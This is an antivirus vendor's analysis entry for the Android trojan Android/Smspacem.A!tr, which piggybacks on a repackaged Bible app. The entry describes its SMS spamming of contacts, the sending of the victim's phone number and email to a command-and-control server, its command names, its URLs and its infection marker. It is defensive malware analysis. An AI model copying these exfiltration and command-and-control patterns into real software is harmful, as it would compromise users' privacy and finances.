This application requires Javascript for optimal performance.

Android/Smspacem.A!tr - Released May 26, 2011 - Last Updated May 27, 2011

Alias/es

Android.Smspacem (Symantec)

Detection Availability

Active DatabaseExtended Database
FortiGate
low
high
FortiClient
FortiMail N/A

Visible Symptoms

  • A new wallpaper appears on the phone with the picture of Stephen Colbert
  • The phone sends SMS messages to all contacts

Detailed Analysis

Android/Smspacem.A!tr targets mobile phone running Android 2.1 or greater. It trojans a legitimate but controversial application called the Holy F***ing Bible. When the mobile phone is infected with Android/Smspacem.A!tr, the application is functional, but in background, the malware runs its malicious tasks. They consist in:
  • sending SMS messages with anti-christian/joke texts to all your contacts
  • sending your email and phone number to a remote web site
  • contacting a Command & Control center every 33 minutes
  • subscribing you to a mailing-list/feed related to the Colbert Report
All those tasks are done without the user's consent. Depending on the user's subscription, it may result in financial loss as the victim may be charged for sending SMS and connecting to Internet.



Technical Details


The malware is usually packaged as holycolbert10.apk (of course, it is possible it propagates under other names). The malicious classes are located in a path named com.YahwehOrNoWay, which is separate from the "legitimate" classes of the Holy F* Bible application.
The malware consists of a service named 'theword'. At startup, it retrieves the phone's phone number and operator name. Then, it schedules all its tasks to run, after a delay of 1 minute, every 33 minutes.
Every 33 minutes, the service gets the current date and formats it MMddyyyy. It tries to open a database 
/data/data/com.AmazingBullshit.HolyFuckingBible/databases/mydb.db
and check the last entry in the myTable table of that database is 'endoftheworld'. This database acts as an infection marker of the device. If it is not present, the malware creates the database, creates the myTable table and inserts the value.

The malware initializes a SOAP request to a malicious C&C center: 
http://[REMOVED].no-ip.biz/talktome.asmx
The SOAP object consists of two properties:
  1. cell: this property contains the phone number of the victim
  2. opname: this property contains the operator's name
It uses a namespace http://tempuri.org (not malicious) and invokes the web service "openmic". As the C&C is now down, we do not exactly know what this web service was meant to do. Apparently, the SOAP object is serialized and sent over HTTP and the web service is meant to answer by a few commands such as "formula401" or "pacem".
If the device's date is May 21, 2011, the malware sends an SMS to all contacts with a text randomly chosen among: 
Cannot talk right now, the world is about to end
Jebus is way over due for a come back
Its the Raptures,praise Jebus
Prepare to meet thy maker,make sure to hedge your bet just in case the Muslims’ were right
Just saw the four horsemen of the apocalypse and man did they have the worst case of road rage
Es el fin del mundo
It also changes the wallpaper to an image of Stephen Colbert.
If the device's date is May 22nd, 2011, the malware sends again another SMS to all contacts with the text "Looks like Jebus is a no show, maybe Judaism was on to something".
If the command "formula401" is sent by the web service, the malware sends SMS messages to all contacts with one of the following links: 
http://turbobit.net/3qijra41byed.html
http://turbobit.net/9fzlltk2eptu.html
http://turbobit.net/9c19sk0tcg8z.html
Those links are not active any longer. It also changes the wallpaper to an image named hammer.jpg.
If the command "pacem" is sent by the web service, the malware sends the victim's email to the following link: 
http://[REMOVED]central.com/global/feeds/entertainment/media/submit_entry.jhtml?collectionID=96&email=EMAIL&format=json&jsoncallback=?

Another malicious class, named SMSsmack.class, implements a message receiver. If the infected device receives a SMS message containing the body "health", it replies to the sender with an SMS with a text randomly chosen among: 
Cannot talk right now, the world is about to end
Jebus is way over due for a come back
Its the Raptures,praise Jebus
Prepare to meet thy maker, make sure to hedge your bet just in case the Muslims were right
Just saw the four horsemen of the apocalypse and man did they have the worst case of road rage
Es el fin del mundo
I am infected and alive ver 1.00
This functionality is probably used by the attacker to test if a given device is still properly infecting or not.

Recommended Action

    FortiGate Systems

  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.

    FortiClient Systems

  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Reference: ID - 2750080